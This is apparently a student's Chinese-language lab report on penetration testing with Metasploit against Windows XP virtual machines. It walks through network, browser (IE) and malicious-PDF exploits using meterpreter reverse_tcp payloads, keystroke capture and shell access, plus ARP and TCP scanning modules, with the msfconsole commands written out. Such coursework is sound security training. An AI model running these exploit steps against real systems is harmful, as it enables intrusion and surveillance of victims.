基础问题回答

解释exploit,payload,encode是什么:

  • exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令。
  • payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体。
  • encode:是重新进行编码,伪装此次攻击,躲过查杀。

实验过程记录

主动攻击实践:ms06_040

首先,在实验前,检查两个虚拟机能否互相ping通

在kali中打开msf

我首先尝试使用ms06_040进行主动攻击

之后,用show targets查看该漏洞可以攻击的系统版本

通过show payloads 查看所有攻击载荷的信息

设置载荷payload

使用show options 命令查看模块所需的各种参数,这些参数可以保证各个模块正常运行。

接下来就完成一些设置,target、RHOST、LHOST。(因为我要攻击的靶机是英文版的XP系统,所以target设置为3)(RHOST为靶机IP、LHOST为主机IP)

输入exploit命令,开始攻击。可是结果显示攻击失败,没有有效的会话建立,我猜测可能是我在target中设置的系统版本不对。

将target修改为2后,我再次执行攻击命令。可是还是攻击失败。另外,我更换了多个payload也还是不行。我觉得应该是使用的XP靶机中安装了针对该漏洞的补丁。真是遗憾啊.....

下面,我用MS08-067漏洞进行了实验。方法和上面一样,完成了攻击。获得了XP的shell

一个针对浏览器的攻击

我先使用ms12-063进行实验

与实验1中步骤类似,只是多了对LUIR的设置。

完成对参数的设置之后,我输入exploit开始攻击

攻击开始,我在靶机中打开目标网页(192.168.223.128:8080/ms5326),因为显示的不完整,所以重复打开了很多次,不知道是不是表明靶机被攻击了。

但是在主机kali中,却不能获得XP的shell,攻击不成功。

后来,我换了个漏洞(ms11-050),继续实验。

主机:192.168.223.129

靶机:192.168.223.130

同上述步骤,第一步,查找相关漏洞信息

然后,加载相应模块
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
找到模块后,可以通过info指令查看模块详细信息

加载payload,set payload windows/meterpreter/reverese_tcp,这里采用meterpreter方式获取权限,设置相应参数,通过show options查看

set URIPATH 5326 //设置访问主页的URI
set LHOST 192.168.223.129 //设置攻击IP
set LPORT 5236 //设置攻击端口
set URLPATH 5326

发起渗透攻击
exploit

此时,在靶机中启动IE 7浏览器,访问链接:http://192.168.211.132:8080/ms5236;

失败了。。。使用的这个xp系统中安装的ie浏览器很是奇怪。。看不出版本号,无法找到相应的漏洞。。使用狄维佳同学提供的虚拟机。。

重新进行上述步骤,但此时靶机ip变为192.168.223.130

打开了http://192.168.223.129:8080/ms5326网址后出现了错误警报。。又失败了

一开始使用教程中提到的ms11_050进行攻击的时候总是被数据执行保护程序杀死进程,努力将IE浏览器的的安全级别降到最低也无济于事,连续试了03_020、ms12_037、ms13_009也不成功
重新查找关于IE的exploit,从时间和等级上进行筛选,最后选择windows/browser/ms14_064_ole_code_execution

按照之前的重新进行配置:

exploit之后
靶机中输入指定的网址:

此时安全警告出来了

kali中:

这里msf下可看见创建了一个3个session

sessions -i 1开始连接后抓取靶机键盘,并获取shell

Adobe阅读器渗透攻击(针对客户端)

kali下打开显示隐藏文件,输入use exploit/windows/fileformat/adobe_cooltype_sing,然后输入set payload windows/meterpreter/reverse_tcp设置攻击有效载荷payloads

set LHOST 192.168.223.129

set FILENAME 5326.pdf

set LPORT 5326

exploit,生成pdf文件以后拷贝到xp虚拟机

back返回,使用use exploit/multi/handler新建一个监听模块。

使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。端口号设置和攻击模块里的数据设置相同。

在靶机中打开pdf文件,相当于打开了一个后门程序,这里pdf打不开,因为其中包含了恶意代码

这里msf下可看见创建了一个ID为4的session,sessions -i 1开始连接后抓取靶机键盘

获取shell

应用辅助模块(为了防止有一样的,我又懒得一个一个的翻同学的博客,所以我就干脆多做了几个。。。希望没有重复的)

参考https://www.cnblogs.com/zlslch/p/6893394.html

  • 一:arp扫描

进入/usr/share/metasploit-framework/modules/auxiliary目录查看有什么项目

选取相应的moudle,在这里选择如下:/scanner/discovery/arp_sweep,在msfconsole中use auxiliary/scanner/discovery/arp_sweep,查看详细信息

设置好相应参数,可以通过show options来查看

set RHOSTS 192.168.223.130 //设置扫描目标IP地址
set THREADS 50 //设置线程数

启动:run,扫描结果如下:

  • 二: tcp扫描

设置好相应参数:

set RHOSTS 192.168.223.130 //设置扫描目标IP地址

启动:run,扫描结果如下:

实验感想

这次的实验分为四个小模块,主要是参考已经完成了的同学博客基础上做实验,在不断搜寻漏洞,分析漏洞,进行攻击的过程中,更加熟练的掌握了如何查找相关攻击模块,分析攻击模块的功能、可以加的payload、能够攻击哪些软件和系统、如何进行攻击前的设置,比如用info、show payloads、show targets、show options。在不断的尝试和重复中,巩固了对知识的理解,也熟练了对msfconsole的使用。做这个实验换了很多个虚拟机。。好多明明别的同学都做出来了,但是我却有问题,只好不断尝试不同的虚拟机。